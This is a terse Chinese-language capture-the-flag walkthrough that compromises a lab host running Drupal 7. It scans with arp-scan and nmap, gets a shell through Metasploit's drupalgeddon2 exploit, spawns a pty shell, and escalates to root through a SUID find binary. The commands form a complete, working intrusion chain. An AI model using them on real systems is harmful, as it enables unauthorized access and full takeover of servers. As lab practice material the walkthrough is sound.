1.扫描主机
sudo arp-scan -l
扫描端口
nmap -p- 192.168.42.147
扫描主机指纹,发现Drupal 7 cms
2.开始msf漏洞利用
mfconsole
search drupal
search 7600
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.42.147
run
3.metepreter> 看到这个,说明成功拿下shell
shell
python -c "import pty;pty.spawn('/bin/bash')" 美化一下
4.开始提权
find / -perm -u=s -type f 2>/dev/null
发现/usr/bin/find,利用提权
find . -exec /bin/sh \;
成功提权,寻找flag